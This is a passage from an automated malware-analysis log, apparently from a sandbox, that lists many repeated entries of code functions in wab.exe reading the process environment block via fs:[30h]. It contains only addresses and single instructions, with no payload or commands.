Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EA352 mov eax, dword ptr fs:[00000030h] 11_2_201EA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011D34C mov eax, dword ptr fs:[00000030h] 11_2_2011D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011D34C mov eax, dword ptr fs:[00000030h] 11_2_2011D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5341 mov eax, dword ptr fs:[00000030h] 11_2_201F5341
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201C437C mov eax, dword ptr fs:[00000030h] 11_2_201C437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20127370 mov eax, dword ptr fs:[00000030h] 11_2_20127370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20127370 mov eax, dword ptr fs:[00000030h] 11_2_20127370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20127370 mov eax, dword ptr fs:[00000030h] 11_2_20127370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF367 mov eax, dword ptr fs:[00000030h] 11_2_201DF367
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F539D mov eax, dword ptr fs:[00000030h] 11_2_201F539D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20118397 mov eax, dword ptr fs:[00000030h] 11_2_20118397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20118397 mov eax, dword ptr fs:[00000030h] 11_2_20118397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20118397 mov eax, dword ptr fs:[00000030h] 11_2_20118397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2017739A mov eax, dword ptr fs:[00000030h] 11_2_2017739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2017739A mov eax, dword ptr fs:[00000030h] 11_2_2017739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011E388 mov eax, dword ptr fs:[00000030h] 11_2_2011E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011E388 mov eax, dword ptr fs:[00000030h] 11_2_2011E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011E388 mov eax, dword ptr fs:[00000030h] 11_2_2011E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014438F mov eax, dword ptr fs:[00000030h] 11_2_2014438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014438F mov eax, dword ptr fs:[00000030h] 11_2_2014438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201433A5 mov eax, dword ptr fs:[00000030h] 11_2_201433A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201533A0 mov eax, dword ptr fs:[00000030h] 11_2_201533A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201533A0 mov eax, dword ptr fs:[00000030h] 11_2_201533A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DB3D0 mov ecx, dword ptr fs:[00000030h] 11_2_201DB3D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DC3CD mov eax, dword ptr fs:[00000030h] 11_2_201DC3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A3C0 mov eax, dword ptr fs:[00000030h] 11_2_2012A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A3C0 mov eax, dword ptr fs:[00000030h] 11_2_2012A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A3C0 mov eax, dword ptr fs:[00000030h] 11_2_2012A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A3C0 mov eax, dword ptr fs:[00000030h] 11_2_2012A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A3C0 mov eax, dword ptr fs:[00000030h] 11_2_2012A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A3C0 mov eax, dword ptr fs:[00000030h] 11_2_2012A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201283C0 mov eax, dword ptr fs:[00000030h] 11_2_201283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201283C0 mov eax, dword ptr fs:[00000030h] 11_2_201283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201283C0 mov eax, dword ptr fs:[00000030h] 11_2_201283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201283C0 mov eax, dword ptr fs:[00000030h] 11_2_201283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F53FC mov eax, dword ptr fs:[00000030h] 11_2_201F53FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013E3F0 mov eax, dword ptr fs:[00000030h] 11_2_2013E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013E3F0 mov eax, dword ptr fs:[00000030h] 11_2_2013E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013E3F0 mov eax, dword ptr fs:[00000030h] 11_2_2013E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201563FF mov eax, dword ptr fs:[00000030h] 11_2_201563FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201303E9 mov eax, dword ptr fs:[00000030h] 11_2_201303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201303E9 mov eax, dword ptr fs:[00000030h] 11_2_201303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201303E9 mov eax, dword ptr fs:[00000030h] 11_2_201303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201303E9 mov eax, dword ptr fs:[00000030h] 11_2_201303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201303E9 mov eax, dword ptr fs:[00000030h] 11_2_201303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201303E9 mov eax, dword ptr fs:[00000030h] 11_2_201303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201303E9 mov eax, dword ptr fs:[00000030h] 11_2_201303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201303E9 mov eax, dword ptr fs:[00000030h] 11_2_201303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF3E6 mov eax, dword ptr fs:[00000030h] 11_2_201DF3E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20158402 mov eax, dword ptr fs:[00000030h] 11_2_20158402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20158402 mov eax, dword ptr fs:[00000030h] 11_2_20158402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20158402 mov eax, dword ptr fs:[00000030h] 11_2_20158402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014340D mov eax, dword ptr fs:[00000030h] 11_2_2014340D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015A430 mov eax, dword ptr fs:[00000030h] 11_2_2015A430
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011E420 mov eax, dword ptr fs:[00000030h] 11_2_2011E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011E420 mov eax, dword ptr fs:[00000030h] 11_2_2011E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011E420 mov eax, dword ptr fs:[00000030h] 11_2_2011E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011C427 mov eax, dword ptr fs:[00000030h] 11_2_2011C427
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011645D mov eax, dword ptr fs:[00000030h] 11_2_2011645D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF453 mov eax, dword ptr fs:[00000030h] 11_2_201DF453
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014245A mov eax, dword ptr fs:[00000030h] 11_2_2014245A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012B440 mov eax, dword ptr fs:[00000030h] 11_2_2012B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012B440 mov eax, dword ptr fs:[00000030h] 11_2_2012B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012B440 mov eax, dword ptr fs:[00000030h] 11_2_2012B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012B440 mov eax, dword ptr fs:[00000030h] 11_2_2012B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012B440 mov eax, dword ptr fs:[00000030h] 11_2_2012B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012B440 mov eax, dword ptr fs:[00000030h] 11_2_2012B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E443 mov eax, dword ptr fs:[00000030h] 11_2_2015E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E443 mov eax, dword ptr fs:[00000030h] 11_2_2015E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E443 mov eax, dword ptr fs:[00000030h] 11_2_2015E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E443 mov eax, dword ptr fs:[00000030h] 11_2_2015E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E443 mov eax, dword ptr fs:[00000030h] 11_2_2015E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E443 mov eax, dword ptr fs:[00000030h] 11_2_2015E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E443 mov eax, dword ptr fs:[00000030h] 11_2_2015E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E443 mov eax, dword ptr fs:[00000030h] 11_2_2015E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F547F mov eax, dword ptr fs:[00000030h] 11_2_201F547F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014A470 mov eax, dword ptr fs:[00000030h] 11_2_2014A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014A470 mov eax, dword ptr fs:[00000030h] 11_2_2014A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014A470 mov eax, dword ptr fs:[00000030h] 11_2_2014A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121460 mov eax, dword ptr fs:[00000030h] 11_2_20121460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121460 mov eax, dword ptr fs:[00000030h] 11_2_20121460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121460 mov eax, dword ptr fs:[00000030h] 11_2_20121460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121460 mov eax, dword ptr fs:[00000030h] 11_2_20121460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121460 mov eax, dword ptr fs:[00000030h] 11_2_20121460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013F460 mov eax, dword ptr fs:[00000030h] 11_2_2013F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013F460 mov eax, dword ptr fs:[00000030h] 11_2_2013F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013F460 mov eax, dword ptr fs:[00000030h] 11_2_2013F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013F460 mov eax, dword ptr fs:[00000030h] 11_2_2013F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013F460 mov eax, dword ptr fs:[00000030h] 11_2_2013F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013F460 mov eax, dword ptr fs:[00000030h] 11_2_2013F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B480 mov eax, dword ptr fs:[00000030h] 11_2_2011B480
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20129486 mov eax, dword ptr fs:[00000030h] 11_2_20129486
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20129486 mov eax, dword ptr fs:[00000030h] 11_2_20129486
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201534B0 mov eax, dword ptr fs:[00000030h] 11_2_201534B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201544B0 mov ecx, dword ptr fs:[00000030h] 11_2_201544B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201AA4B0 mov eax, dword ptr fs:[00000030h] 11_2_201AA4B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201264AB mov eax, dword ptr fs:[00000030h] 11_2_201264AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F54DB mov eax, dword ptr fs:[00000030h] 11_2_201F54DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201204E5 mov ecx, dword ptr fs:[00000030h] 11_2_201204E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201C94E0 mov eax, dword ptr fs:[00000030h] 11_2_201C94E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20157505 mov eax, dword ptr fs:[00000030h] 11_2_20157505
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20157505 mov ecx, dword ptr fs:[00000030h] 11_2_20157505
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F4500 mov eax, dword ptr fs:[00000030h] 11_2_201F4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F4500 mov eax, dword ptr fs:[00000030h] 11_2_201F4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F4500 mov eax, dword ptr fs:[00000030h] 11_2_201F4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F4500 mov eax, dword ptr fs:[00000030h] 11_2_201F4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F4500 mov eax, dword ptr fs:[00000030h] 11_2_201F4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F4500 mov eax, dword ptr fs:[00000030h] 11_2_201F4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F4500 mov eax, dword ptr fs:[00000030h] 11_2_201F4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015D530 mov eax, dword ptr fs:[00000030h] 11_2_2015D530
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015D530 mov eax, dword ptr fs:[00000030h] 11_2_2015D530
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130535 mov eax, dword ptr fs:[00000030h] 11_2_20130535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130535 mov eax, dword ptr fs:[00000030h] 11_2_20130535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130535 mov eax, dword ptr fs:[00000030h] 11_2_20130535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130535 mov eax, dword ptr fs:[00000030h] 11_2_20130535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130535 mov eax, dword ptr fs:[00000030h] 11_2_20130535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130535 mov eax, dword ptr fs:[00000030h] 11_2_20130535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012D534 mov eax, dword ptr fs:[00000030h] 11_2_2012D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012D534 mov eax, dword ptr fs:[00000030h] 11_2_2012D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012D534 mov eax, dword ptr fs:[00000030h] 11_2_2012D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012D534 mov eax, dword ptr fs:[00000030h] 11_2_2012D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012D534 mov eax, dword ptr fs:[00000030h] 11_2_2012D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012D534 mov eax, dword ptr fs:[00000030h] 11_2_2012D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5537 mov eax, dword ptr fs:[00000030h] 11_2_201F5537
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E53E mov eax, dword ptr fs:[00000030h] 11_2_2014E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E53E mov eax, dword ptr fs:[00000030h] 11_2_2014E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E53E mov eax, dword ptr fs:[00000030h] 11_2_2014E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E53E mov eax, dword ptr fs:[00000030h] 11_2_2014E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E53E mov eax, dword ptr fs:[00000030h] 11_2_2014E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DB52F mov eax, dword ptr fs:[00000030h] 11_2_201DB52F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CF525 mov eax, dword ptr fs:[00000030h] 11_2_201CF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CF525 mov eax, dword ptr fs:[00000030h] 11_2_201CF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CF525 mov eax, dword ptr fs:[00000030h] 11_2_201CF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CF525 mov eax, dword ptr fs:[00000030h] 11_2_201CF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CF525 mov eax, dword ptr fs:[00000030h] 11_2_201CF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CF525 mov eax, dword ptr fs:[00000030h] 11_2_201CF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CF525 mov eax, dword ptr fs:[00000030h] 11_2_201CF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20128550 mov eax, dword ptr fs:[00000030h] 11_2_20128550
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20128550 mov eax, dword ptr fs:[00000030h] 11_2_20128550
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015B570 mov eax, dword ptr fs:[00000030h] 11_2_2015B570
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015B570 mov eax, dword ptr fs:[00000030h] 11_2_2015B570
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B562 mov eax, dword ptr fs:[00000030h] 11_2_2011B562
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015656A mov eax, dword ptr fs:[00000030h] 11_2_2015656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015656A mov eax, dword ptr fs:[00000030h] 11_2_2015656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015656A mov eax, dword ptr fs:[00000030h] 11_2_2015656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E59C mov eax, dword ptr fs:[00000030h] 11_2_2015E59C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201AB594 mov eax, dword ptr fs:[00000030h] 11_2_201AB594
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201AB594 mov eax, dword ptr fs:[00000030h] 11_2_201AB594
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20122582 mov eax, dword ptr fs:[00000030h] 11_2_20122582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20122582 mov ecx, dword ptr fs:[00000030h] 11_2_20122582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20154588 mov eax, dword ptr fs:[00000030h] 11_2_20154588
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011758F mov eax, dword ptr fs:[00000030h] 11_2_2011758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011758F mov eax, dword ptr fs:[00000030h] 11_2_2011758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011758F mov eax, dword ptr fs:[00000030h] 11_2_2011758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B35BA mov eax, dword ptr fs:[00000030h] 11_2_201B35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B35BA mov eax, dword ptr fs:[00000030h] 11_2_201B35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B35BA mov eax, dword ptr fs:[00000030h] 11_2_201B35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B35BA mov eax, dword ptr fs:[00000030h] 11_2_201B35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF5BE mov eax, dword ptr fs:[00000030h] 11_2_201DF5BE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F5B0 mov eax, dword ptr fs:[00000030h] 11_2_2014F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F5B0 mov eax, dword ptr fs:[00000030h] 11_2_2014F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F5B0 mov eax, dword ptr fs:[00000030h] 11_2_2014F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F5B0 mov eax, dword ptr fs:[00000030h] 11_2_2014F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F5B0 mov eax, dword ptr fs:[00000030h] 11_2_2014F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F5B0 mov eax, dword ptr fs:[00000030h] 11_2_2014F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F5B0 mov eax, dword ptr fs:[00000030h] 11_2_2014F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F5B0 mov eax, dword ptr fs:[00000030h] 11_2_2014F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F5B0 mov eax, dword ptr fs:[00000030h] 11_2_2014F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201445B1 mov eax, dword ptr fs:[00000030h] 11_2_201445B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201445B1 mov eax, dword ptr fs:[00000030h] 11_2_201445B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A05A7 mov eax, dword ptr fs:[00000030h] 11_2_201A05A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A05A7 mov eax, dword ptr fs:[00000030h] 11_2_201A05A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A05A7 mov eax, dword ptr fs:[00000030h] 11_2_201A05A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415A9 mov eax, dword ptr fs:[00000030h] 11_2_201415A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415A9 mov eax, dword ptr fs:[00000030h] 11_2_201415A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415A9 mov eax, dword ptr fs:[00000030h] 11_2_201415A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415A9 mov eax, dword ptr fs:[00000030h] 11_2_201415A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415A9 mov eax, dword ptr fs:[00000030h] 11_2_201415A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201265D0 mov eax, dword ptr fs:[00000030h] 11_2_201265D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015A5D0 mov eax, dword ptr fs:[00000030h] 11_2_2015A5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015A5D0 mov eax, dword ptr fs:[00000030h] 11_2_2015A5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F35D7 mov eax, dword ptr fs:[00000030h] 11_2_201F35D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F35D7 mov eax, dword ptr fs:[00000030h] 11_2_201F35D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F35D7 mov eax, dword ptr fs:[00000030h] 11_2_201F35D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201495DA mov eax, dword ptr fs:[00000030h] 11_2_201495DA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201555C0 mov eax, dword ptr fs:[00000030h] 11_2_201555C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F55C9 mov eax, dword ptr fs:[00000030h] 11_2_201F55C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E5CF mov eax, dword ptr fs:[00000030h] 11_2_2015E5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E5CF mov eax, dword ptr fs:[00000030h] 11_2_2015E5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415F4 mov eax, dword ptr fs:[00000030h] 11_2_201415F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415F4 mov eax, dword ptr fs:[00000030h] 11_2_201415F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415F4 mov eax, dword ptr fs:[00000030h] 11_2_201415F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415F4 mov eax, dword ptr fs:[00000030h] 11_2_201415F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415F4 mov eax, dword ptr fs:[00000030h] 11_2_201415F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415F4 mov eax, dword ptr fs:[00000030h] 11_2_201415F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201225E0 mov eax, dword ptr fs:[00000030h] 11_2_201225E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E5E7 mov eax, dword ptr fs:[00000030h] 11_2_2014E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E5E7 mov eax, dword ptr fs:[00000030h] 11_2_2014E5E7
